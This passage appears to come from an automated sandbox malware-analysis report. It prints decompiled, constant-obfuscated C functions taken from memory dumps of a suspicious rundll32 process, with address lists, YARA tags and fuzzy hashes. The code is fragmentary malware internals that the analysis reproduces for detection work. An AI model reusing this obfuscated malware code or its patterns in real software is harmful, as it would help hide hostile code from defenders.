				_v12 = _v12 * 0x6c;
				_v12 = _v12 >> 0x10;
				_v12 = _v12 >> 1;
				_v12 = _v12 ^ 0x00007e37;
				_v16 = 0xc92d;
				_v16 = _v16 >> 5;
				_v16 = _v16 | 0xe8c7394a;
				_v16 = _v16 ^ 0xe8c76f48;
				if(E01FFC931( &_v560, _v8, _v24, _v32) != 0) {
					_t92 =  &_v560;
					if(_v560 != 0) {
						while( *_t92 != 0x5c) {
							_t92 = _t92 + 2;
							if( *_t92 != 0) {
								continue;
							} else {
							}
							goto L6;
						}
						 *((short*)(_t92 + 2)) = 0;
					}
					L6:
					E0200E0AF(0, _v20, 0, _v36, 0,  &_v40, _v28, 0,  &_v560, 0, _v12, 0, _v16);
				}
				return _v40;
			}














                                                                      0x01ffa6d7
                                                                      0x01ffa6da
                                                                      0x01ffa6e1
                                                                      0x01ffa6e5
                                                                      0x01ffa6e9
                                                                      0x01ffa6f0
                                                                      0x01ffa6f7
                                                                      0x01ffa6fe
                                                                      0x01ffa708
                                                                      0x01ffa70a
                                                                      0x01ffa70f
                                                                      0x01ffa712
                                                                      0x01ffa719
                                                                      0x01ffa720
                                                                      0x01ffa727
                                                                      0x01ffa72b
                                                                      0x01ffa732
                                                                      0x01ffa739
                                                                      0x01ffa744
                                                                      0x01ffa747
                                                                      0x01ffa74e
                                                                      0x01ffa755
                                                                      0x01ffa759
                                                                      0x01ffa760
                                                                      0x01ffa772
                                                                      0x01ffa779
                                                                      0x01ffa77c
                                                                      0x01ffa783
                                                                      0x01ffa78e
                                                                      0x01ffa791
                                                                      0x01ffa795
                                                                      0x01ffa798
                                                                      0x01ffa79f
                                                                      0x01ffa7a6
                                                                      0x01ffa7aa
                                                                      0x01ffa7b1
                                                                      0x01ffa7cb
                                                                      0x01ffa7cd
                                                                      0x01ffa7da
                                                                      0x01ffa7dc
                                                                      0x01ffa7e2
                                                                      0x01ffa7e8
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x01ffa7ea
                                                                      0x00000000
                                                                      0x01ffa7e8
                                                                      0x01ffa7ee
                                                                      0x01ffa7ee
                                                                      0x01ffa7f2
                                                                      0x01ffa811
                                                                      0x01ffa816
                                                                      0x01ffa820

                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d0ed3f14480d6fb85cf8ede8ed01864779f7b807295fd40e7721b35f462d89f7
                                                                      • Instruction ID: aea2d6f94327fc1418d11e7f3db1f933b5333d8f31434ae258a634ded82424e6
                                                                      • Opcode Fuzzy Hash: d0ed3f14480d6fb85cf8ede8ed01864779f7b807295fd40e7721b35f462d89f7
                                                                      • Instruction Fuzzy Hash: 7A41E472C0021EABDF19CFA5C94A9EEBBB5FB04304F208199D115B61A0D3B95B59CF91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00239C3D, Relevance: .1, Instructions: 90COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d0ed3f14480d6fb85cf8ede8ed01864779f7b807295fd40e7721b35f462d89f7
                                                                      • Instruction ID: c183fd4c343abe9295d6eb68c285cf492b1636a18e48cf87bc94fd6402f20064
                                                                      • Opcode Fuzzy Hash: d0ed3f14480d6fb85cf8ede8ed01864779f7b807295fd40e7721b35f462d89f7
                                                                      • Instruction Fuzzy Hash: 6F4102B2C0020EABDF19DFE1D84A9EEBBB5FB04304F208199D014B61A0D3B95B59CF91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0200D4E1, Relevance: .1, Instructions: 87COMMONCrypto
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 28%
                                                                      			E0200D4E1(void* __ecx, void* __eflags) {
				signed int _v8;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				char _v40;
				signed int _t103;
				signed int _t107;
				signed int _t108;
				signed int _t109;
				void* _t117;
				void* _t118;
				signed int _t119;
				void* _t122;

				_t122 = __eflags;
				_v8 = 0x9d48;
				_v8 = _v8 << 0xa;
				_t118 = __ecx;
				_t107 = 0xc;
				_v8 = _v8 / _t107;
				_v8 = _v8 ^ 0x84a8c1f7;
				_v8 = _v8 ^ 0x849ce678;
				_v16 = 0x4884;
				_v16 = _v16 + 0xfffff3b9;
				_v16 = _v16 ^ 0x6bddc2ef;
				_v16 = _v16 >> 0xf;
				_v16 = _v16 ^ 0x0000e0dc;
				_v12 = 0x1ff1;
				_t108 = 0x5e;
				_v12 = _v12 * 0x6e;
				_v12 = _v12 << 0xe;
				_v12 = _v12 * 0xd;
				_v12 = _v12 ^ 0x9b0dd4a2;
				_v28 = 0x87c6;
				_v28 = _v28 + 0xffff61ee;
				_v28 = _v28 / _t108;
				_v28 = _v28 ^ 0x02b97512;
				_v24 = 0x2da2;
				_v24 = _v24 + 0xffff2827;
				_v24 = _v24 + 0xffff9d22;
				_v24 = _v24 ^ 0xfffeb986;
				_v20 = 0x7758;
				_v20 = _v20 >> 0xf;
				_v20 = _v20 | 0x0ba9e341;
				_v20 = _v20 ^ 0x0ba99bf4;
				_v36 = 0x8619;
				_v36 = _v36 ^ 0x2bac5130;
				_v36 = _v36 ^ 0x2bac97af;
				_v40 = E01FFA156();
				_v32 = 0x8f7a;
				_t109 = 0x71;
				_v32 = _v32 / _t109;
				_v32 = _v32 ^ 0x00000141;
				_v8 = 0xc831;
				_v8 = _v8 + 0xffffeaea;
				_v8 = _v8 >> 2;
				_v8 = _v8 ^ 0x00002cd6;
				_t103 = E01FFDF8A(_t109, _v32 % _t109, _t122, _v8, _v32);
				_push(_v36);
				_t119 = _t103;
				_push(_v20);
				_push(_v24);
				_push(_t118);
				_push(_t119);
				_push(_v28);
				_t117 = 3;
				E02009A27( &_v40, _t117);
				 *((short*)(_t118 + _t119 * 2)) = 0;
				return 0;
			}




















                                                                      0x0200d4e1
                                                                      0x0200d4e7
                                                                      0x0200d4f0
                                                                      0x0200d4fb
                                                                      0x0200d4fd
                                                                      0x0200d502
                                                                      0x0200d507
                                                                      0x0200d50e
                                                                      0x0200d515
                                                                      0x0200d51c
                                                                      0x0200d523
                                                                      0x0200d52a
                                                                      0x0200d52e
                                                                      0x0200d535
                                                                      0x0200d540
                                                                      0x0200d541
                                                                      0x0200d544
                                                                      0x0200d54c
                                                                      0x0200d54f
                                                                      0x0200d556
                                                                      0x0200d55d
                                                                      0x0200d569
                                                                      0x0200d56c
                                                                      0x0200d573
                                                                      0x0200d57a
                                                                      0x0200d581
                                                                      0x0200d588
                                                                      0x0200d58f
                                                                      0x0200d596
                                                                      0x0200d59a
                                                                      0x0200d5a1
                                                                      0x0200d5a8
                                                                      0x0200d5af
                                                                      0x0200d5b6
                                                                      0x0200d5c5
                                                                      0x0200d5ca
                                                                      0x0200d5d6
                                                                      0x0200d5d9
                                                                      0x0200d5dc
                                                                      0x0200d5e3
                                                                      0x0200d5ea
                                                                      0x0200d5f1
                                                                      0x0200d5f5
                                                                      0x0200d608
                                                                      0x0200d60d
                                                                      0x0200d610
                                                                      0x0200d615
                                                                      0x0200d618
                                                                      0x0200d61b
                                                                      0x0200d61c
                                                                      0x0200d61d
                                                                      0x0200d622
                                                                      0x0200d623
                                                                      0x0200d62d
                                                                      0x0200d636

                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a434f546294ff16000c075816f5c378907933f48be170b95346e54a9c6ecf090
                                                                      • Instruction ID: c0d4a1055e143fcd9f15d57e7d446460813811721464b67cefbc49e9c5eaa867
                                                                      • Opcode Fuzzy Hash: a434f546294ff16000c075816f5c378907933f48be170b95346e54a9c6ecf090
                                                                      • Instruction Fuzzy Hash: 80410372D0120AEBDF08CFE5D94A9DEBBB1FB44304F208199E215B62A0D7B94B55DF80
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0024CA55, Relevance: .1, Instructions: 87COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a434f546294ff16000c075816f5c378907933f48be170b95346e54a9c6ecf090
                                                                      • Instruction ID: 2e26358b028229237488a13de3275f8f71427765ad45d5d1482eef6a0940de73
                                                                      • Opcode Fuzzy Hash: a434f546294ff16000c075816f5c378907933f48be170b95346e54a9c6ecf090
                                                                      • Instruction Fuzzy Hash: 0641F472D0120AEBDF08CFE5D94A9DEBBB1FB44304F208199E211BA1A0D7B94B55DF80
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 02000B8A, Relevance: .1, Instructions: 74COMMONCrypto
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 91%
                                                                      			E02000B8A(void* __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _t100;
				signed int _t101;

				_v36 = 0x5aa;
				_v36 = _v36 >> 0x10;
				_v36 = _v36 ^ 0x0000330c;
				_v32 = 0xdf00;
				_v32 = _v32 | 0xab132c2b;
				_v32 = _v32 ^ 0xab13f0c0;
				_v8 = 0x63ed;
				_t100 = __edx;
				_v8 = _v8 * 0x4e;
				_v8 = _v8 ^ 0xf2c24d67;
				_v8 = _v8 ^ 0x1b3721e6;
				_v8 = _v8 ^ 0xe9eb1c06;
				_v24 = 0xe288;
				_v24 = _v24 + 0xbb54;
				_v24 = _v24 + 0xdb0d;
				_v24 = _v24 ^ 0x00023210;
				_v40 = 0x5eed;
				_v40 = _v40 + 0xffff6eb1;
				_v40 = _v40 ^ 0xfffff76e;
				_v12 = 0x6942;
				_v12 = _v12 << 0xe;
				_v12 = _v12 >> 4;
				_t101 = 0xb;
				_push(__ecx);
				_v12 = _v12 / _t101;
				_v12 = _v12 ^ 0x00267602;
				_v28 = 0x620d;
				_v28 = _v28 + 0xffff96d2;
				_v28 = _v28 << 0xa;
				_v28 = _v28 ^ 0xffe35567;
				_v20 = 0x2a57;
				_v20 = _v20 << 6;
				_v20 = _v20 ^ 0x7bcf801d;
				_v20 = _v20 * 0x1d;
				_v20 = _v20 ^ 0x05537e8d;
				_v16 = 0x5dcb;
				_v16 = _v16 << 0xb;
				_v16 = _v16 | 0x4e4aa2fe;
				_v16 = _v16 + 0x15cc;
				_v16 = _v16 ^ 0x4eef698c;
				_push(_v24);
				_push(_v8);
				 *((intOrPtr*)( *0x2011080 + 0x1c + _t100 * 4)) = E020049CF(_v40, _v12, E01FF5DFC(_v36, _v32, _v16));
				return E02000D6D(_v28, _v20, _v16, _t86);
			}














                                                                      0x02000b90
                                                                      0x02000b97
                                                                      0x02000b9b
                                                                      0x02000ba2
                                                                      0x02000ba9
                                                                      0x02000bb0
                                                                      0x02000bb7
                                                                      0x02000bc6
                                                                      0x02000bca
                                                                      0x02000bcd
                                                                      0x02000bd4
                                                                      0x02000bdb
                                                                      0x02000be2
                                                                      0x02000be9
                                                                      0x02000bf0
                                                                      0x02000bf7
                                                                      0x02000bfe
                                                                      0x02000c05
                                                                      0x02000c0c
                                                                      0x02000c13
                                                                      0x02000c1a
                                                                      0x02000c1e
                                                                      0x02000c25
                                                                      0x02000c28
                                                                      0x02000c29
                                                                      0x02000c2c
                                                                      0x02000c33
                                                                      0x02000c3a
                                                                      0x02000c41
                                                                      0x02000c45
                                                                      0x02000c4c
                                                                      0x02000c53
                                                                      0x02000c57
                                                                      0x02000c62
                                                                      0x02000c65
                                                                      0x02000c6c
                                                                      0x02000c73
                                                                      0x02000c77
                                                                      0x02000c7e
                                                                      0x02000c85
                                                                      0x02000c8c
                                                                      0x02000c8f
                                                                      0x02000cb8
                                                                      0x02000ccc

                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: be845ad11959adaad790ebe7d4dc555bbf68bf08421f9ff1a6cb0869c00de1ff
                                                                      • Instruction ID: a367857103724a2826d303a9e1efe929e077125475e99df1c231b476f599187d
                                                                      • Opcode Fuzzy Hash: be845ad11959adaad790ebe7d4dc555bbf68bf08421f9ff1a6cb0869c00de1ff
                                                                      • Instruction Fuzzy Hash: 8231EF71C0121AEBDB58DFA5D94A4DEBBB1FB44314F208599C122B72A0D7B94B05CF91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 002400FE, Relevance: .1, Instructions: 74COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c95661d2484b6314445495ddb305d22a50364b520d0b0d89c1b5f7c49ec30cd5
                                                                      • Instruction ID: 423b90169c0635f08b7e144b8b37609ce883b47a2eca9b9fc62eb3e7f742a849
                                                                      • Opcode Fuzzy Hash: c95661d2484b6314445495ddb305d22a50364b520d0b0d89c1b5f7c49ec30cd5
                                                                      • Instruction Fuzzy Hash: C331F1B1C0061AEBDF58CFA5C94A4DEBBB1FB44314F208199C122B7290D7B94B55CF91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 01FF7378, Relevance: .1, Instructions: 73COMMONCrypto
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 75%
                                                                      			E01FF7378(intOrPtr _a8, intOrPtr _a16, signed int _a20) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				void* _v48;
				intOrPtr _v52;
				void* _t84;
				signed int _t86;
				signed int _t92;

				_v52 = 0x16987;
				_t92 = _a20;
				asm("stosd");
				_t86 = 0x19;
				asm("stosd");
				asm("stosd");
				_v32 = 0xbca3;
				_v32 = _v32 + 0xffa8;
				_v32 = _v32 ^ 0x0001b5a0;
				_v28 = 0x7499;
				_v28 = _v28 ^ 0x8b4212c4;
				_v28 = _v28 ^ 0x8b424b18;
				_v24 = 0x998c;
				_v24 = _v24 + 0xffffcf68;
				_v24 = _v24 ^ 0x0000327c;
				_v20 = 0xcacf;
				_v20 = _v20 << 6;
				_v20 = _v20 ^ 0x0032e4d9;
				_v36 = 0xb036;
				_v36 = _v36 * 0x6f;
				_v36 = _v36 ^ 0x004c1ab0;
				_v16 = 0xe7fa;
				_v16 = _v16 >> 0xe;
				_v16 = _v16 * 0x72;
				_v16 = _v16 ^ 0x0000227a;
				_v12 = 0xf6b9;
				_v12 = _v12 | 0x229c8a7f;
				_v12 = _v12 << 0x10;
				_v12 = _v12 ^ 0x08e044b9;
				_v12 = _v12 ^ 0xf61f6f05;
				_v8 = 0xd627;
				_v8 = _v8 ^ 0xe545ff33;
				_v8 = _v8 / _t86;
				_v8 = _v8 | 0x013bd0a8;
				_v8 = _v8 ^ 0x093b8413;
				if( *((intOrPtr*)(0x2010408 + _t92 * 4)) == 0) {
					_push(_t86);
					_push(_t86);
					_t84 = E02000223(_a16);
					_push(_a8);
					_push(_v8);
					_push(_v12);
					_push(_v16);
					 *((intOrPtr*)(0x2010408 + _t92 * 4)) = E0200C4DD(_v36, _t84);
				}
				return  *((intOrPtr*)(0x2010408 + _t92 * 4));
			}
















                                                                      0x01ff737e
                                                                      0x01ff738c
                                                                      0x01ff738f
                                                                      0x01ff7394
                                                                      0x01ff7395
                                                                      0x01ff7396
                                                                      0x01ff7397
                                                                      0x01ff739e
                                                                      0x01ff73a5
                                                                      0x01ff73ac
                                                                      0x01ff73b3
                                                                      0x01ff73ba
                                                                      0x01ff73c1
                                                                      0x01ff73c8
                                                                      0x01ff73cf
                                                                      0x01ff73d6
                                                                      0x01ff73dd
                                                                      0x01ff73e1
                                                                      0x01ff73e8
                                                                      0x01ff73f3
                                                                      0x01ff73f6
                                                                      0x01ff73fd
                                                                      0x01ff7404
                                                                      0x01ff740c
                                                                      0x01ff740f
                                                                      0x01ff7416
                                                                      0x01ff741d
                                                                      0x01ff7424
                                                                      0x01ff7428
                                                                      0x01ff742f
                                                                      0x01ff7436
                                                                      0x01ff743d
                                                                      0x01ff7449
                                                                      0x01ff744c
                                                                      0x01ff7453
                                                                      0x01ff7462
                                                                      0x01ff7470
                                                                      0x01ff7471
                                                                      0x01ff7475
                                                                      0x01ff747a
                                                                      0x01ff747f
                                                                      0x01ff7482
                                                                      0x01ff7485
                                                                      0x01ff7493
                                                                      0x01ff7493
                                                                      0x01ff74a6

                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d5614f9c998030e705bf9431ad396a74a195a7eab51c6da394f206f8cf5ef5e9
                                                                      • Instruction ID: ff53ea96efa840fb829be5974939e238b7570f9aa468a8d80c1c85b4e346b8f8
                                                                      • Opcode Fuzzy Hash: d5614f9c998030e705bf9431ad396a74a195a7eab51c6da394f206f8cf5ef5e9
                                                                      • Instruction Fuzzy Hash: B03102B5D0021DEFEF44DFA8D94A4EEBBB5FB48304F108159E911B62A0D3B84A45DFA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 01FF5418, Relevance: .1, Instructions: 70COMMONCrypto
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 67%
                                                                      			E01FF5418(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, signed char* _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				unsigned int _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _t53;
				signed int _t66;
				signed int _t67;
				void* _t79;
				intOrPtr _t80;

				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E02002550(_t53);
				_v32 = 0x6749d6;
				_t80 = 0;
				_v28 = 0;
				_v24 = 0;
				_v16 = 0xfeb6;
				_v16 = _v16 ^ 0x1a3a87a5;
				_v16 = _v16 >> 2;
				_v16 = _v16 ^ 0x068ee483;
				_v12 = 0xf4bf;
				_v12 = _v12 << 5;
				_v12 = _v12 >> 6;
				_v12 = _v12 ^ 0x00001984;
				_v20 = 0x5159;
				_v20 = _v20 >> 0xa;
				_v20 = _v20 ^ 0x00003ebb;
				_v8 = 0x7bf9;
				_t66 = 0x7e;
				_v8 = _v8 / _t66;
				_v8 = _v8 ^ 0xf75420d9;
				_t67 = 0x73;
				_v8 = _v8 / _t67;
				_v8 = _v8 ^ 0x0226967d;
				_t79 = E01FF54FB(0x40000);
				if(_t79 != 0) {
					_push(_t79);
					_push(_a4);
					_push(_a20);
					_t80 = E020016E0(_a12, _a16);
					E01FFDE81(_v20, _t79, _v8);
				}
				return _t80;
			}















                                                                      0x01ff5420
                                                                      0x01ff5423
                                                                      0x01ff5426
                                                                      0x01ff5429
                                                                      0x01ff542c
                                                                      0x01ff542f
                                                                      0x01ff5430
                                                                      0x01ff5431
                                                                      0x01ff5436
                                                                      0x01ff543d
                                                                      0x01ff543f
                                                                      0x01ff5444
                                                                      0x01ff5447
                                                                      0x01ff544e
                                                                      0x01ff5455
                                                                      0x01ff5459
                                                                      0x01ff5460
                                                                      0x01ff5467
                                                                      0x01ff546b
                                                                      0x01ff546f
                                                                      0x01ff5476
                                                                      0x01ff547d
                                                                      0x01ff5481
                                                                      0x01ff5488
                                                                      0x01ff5494
                                                                      0x01ff5499
                                                                      0x01ff549e
                                                                      0x01ff54a8
                                                                      0x01ff54b3
                                                                      0x01ff54b6
                                                                      0x01ff54c8
                                                                      0x01ff54cd
                                                                      0x01ff54d5
                                                                      0x01ff54d6
                                                                      0x01ff54d9
                                                                      0x01ff54e9
                                                                      0x01ff54eb
                                                                      0x01ff54f0
                                                                      0x01ff54fa

                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5c524b21261d76773f5d7c74b417b0e1b019995d9dbf959723682bfc805f13a9
                                                                      • Instruction ID: a6cdbe875ef7d5885f3882f30b64b6b775b65269ff3d417b78d660ea2abbcd37
                                                                      • Opcode Fuzzy Hash: 5c524b21261d76773f5d7c74b417b0e1b019995d9dbf959723682bfc805f13a9
                                                                      • Instruction Fuzzy Hash: 97213772E00209EBDF05DFE9D8099DFBBB2EF44704F108099E914A7260D7B69A14DF80
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 01FFDE81, Relevance: .1, Instructions: 60COMMONCrypto
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 89%
                                                                      			E01FFDE81(void* __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				void* _t61;
				signed int _t71;

				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E02002550(_t61);
				_v8 = 0x815e;
				_v8 = _v8 | 0x0f7b832c;
				_t71 = 0x1f;
				_v8 = _v8 / _t71;
				_v8 = _v8 ^ 0x007fc6d9;
				_v20 = 0x1739;
				_v20 = _v20 | 0x0d3215ff;
				_v20 = _v20 ^ 0x0d32419d;
				_v24 = 0x65f5;
				_v24 = _v24 + 0x3c25;
				_v24 = _v24 ^ 0x0000c547;
				_v16 = 0xa0ce;
				_v16 = _v16 + 0xefa2;
				_v16 = _v16 >> 6;
				_v16 = _v16 ^ 0x00000fc3;
				_v16 = 0x5b12;
				_v16 = _v16 | 0xa0c0d766;
				_v16 = _v16 * 0x44;
				_v16 = _v16 ^ 0xb33b088d;
				_v24 = 0x32c7;
				_v24 = _v24 ^ 0x4853b697;
				_v24 = _v24 ^ 0x4853c8a7;
				_v16 = 0x1aa;
				_v16 = _v16 + 0x7f2c;
				_v16 = _v16 | 0xff30d166;
				_v16 = _v16 ^ 0xff30c9aa;
				_v12 = 0xd947;
				_v12 = _v12 ^ 0x0ebf1cd4;
				_v12 = _v12 + 0xffff3fa5;
				_v12 = _v12 ^ 0x0ebf1307;
				return E01FF3A9D(__edx, _v24, _v16, _v12, _t71, E01FF7AA1(_t71));
			}










                                                                      0x01ffde88
                                                                      0x01ffde8d
                                                                      0x01ffde8e
                                                                      0x01ffde8f
                                                                      0x01ffde94
                                                                      0x01ffde9e
                                                                      0x01ffdeac
                                                                      0x01ffdeaf
                                                                      0x01ffdeb2
                                                                      0x01ffdeb9
                                                                      0x01ffdec0
                                                                      0x01ffdec7
                                                                      0x01ffdece
                                                                      0x01ffded5
                                                                      0x01ffdedc
                                                                      0x01ffdee3
                                                                      0x01ffdeea
                                                                      0x01ffdef1
                                                                      0x01ffdef5
                                                                      0x01ffdefc
                                                                      0x01ffdf03
                                                                      0x01ffdf0e
                                                                      0x01ffdf11
                                                                      0x01ffdf18
                                                                      0x01ffdf1f
                                                                      0x01ffdf26
                                                                      0x01ffdf2d
                                                                      0x01ffdf34
                                                                      0x01ffdf3b
                                                                      0x01ffdf42
                                                                      0x01ffdf49
                                                                      0x01ffdf50
                                                                      0x01ffdf57
                                                                      0x01ffdf5e
                                                                      0x01ffdf89

                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 47619f77d15d650af17f0a4cc88ed58ba79014e9d70a39a1b2907f2ac558bd10
                                                                      • Instruction ID: 57bc9e22b9b28e086796ccfaf650521b6bf26ba4b911a1a0abde5365d13790b4
                                                                      • Opcode Fuzzy Hash: 47619f77d15d650af17f0a4cc88ed58ba79014e9d70a39a1b2907f2ac558bd10
                                                                      • Instruction Fuzzy Hash: 0521F475D0131DEBEB48DFA6C90A4AEBFB5EB10318F108198D425B62A0D3B94B18DF91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 02001DFE, Relevance: .0, Instructions: 47COMMONCrypto
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E02001DFE(void* __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;

				_v32 = _v32 & 0x00000000;
				_v12 = 0xa959;
				_v12 = _v12 >> 6;
				_v12 = _v12 ^ 0x0d27cc61;
				_v12 = _v12 << 0x10;
				_v12 = _v12 ^ 0xcec4698e;
				_v8 = 0x266;
				_v8 = _v8 | 0x1b157375;
				_v8 = _v8 >> 9;
				_v8 = _v8 | 0x60c31c80;
				_v8 = _v8 ^ 0x60cfecf0;
				_v20 = 0xddd8;
				_v20 = _v20 | 0xb972bece;
				_v20 = _v20 << 2;
				_v20 = _v20 ^ 0x20fc7b64;
				_v20 = _v20 ^ 0xc537d2af;
				_v28 = 0x5083;
				_v28 = _v28 << 0xc;
				_v28 = _v28 ^ 0x05080fa9;
				_v24 = 0xe86a;
				_v24 = _v24 >> 5;
				_v24 = _v24 + 0xc90c;
				_v24 = _v24 ^ 0x00009a6e;
				_v16 = 0x5939;
				_v16 = _v16 << 1;
				_v16 = _v16 + 0xfb70;
				_v16 = _v16 + 0xffff7911;
				_v16 = _v16 ^ 0x000120b2;
				E02006A9A(_v20, _v28, _v24, _v16, E02001999(),  &_v32);
				return _v32;
			}










                                                                      0x02001e04
                                                                      0x02001e08
                                                                      0x02001e0f
                                                                      0x02001e13
                                                                      0x02001e1a
                                                                      0x02001e1e
                                                                      0x02001e25
                                                                      0x02001e2c
                                                                      0x02001e33
                                                                      0x02001e37
                                                                      0x02001e3e
                                                                      0x02001e45
                                                                      0x02001e4c
                                                                      0x02001e53
                                                                      0x02001e57
                                                                      0x02001e5e
                                                                      0x02001e65
                                                                      0x02001e6c
                                                                      0x02001e70
                                                                      0x02001e77
                                                                      0x02001e7e
                                                                      0x02001e82
                                                                      0x02001e89
                                                                      0x02001e90
                                                                      0x02001e97
                                                                      0x02001e9a
                                                                      0x02001ea1
                                                                      0x02001ea8
                                                                      0x02001ecb
                                                                      0x02001ed9

                                                                      Memory Dump Source
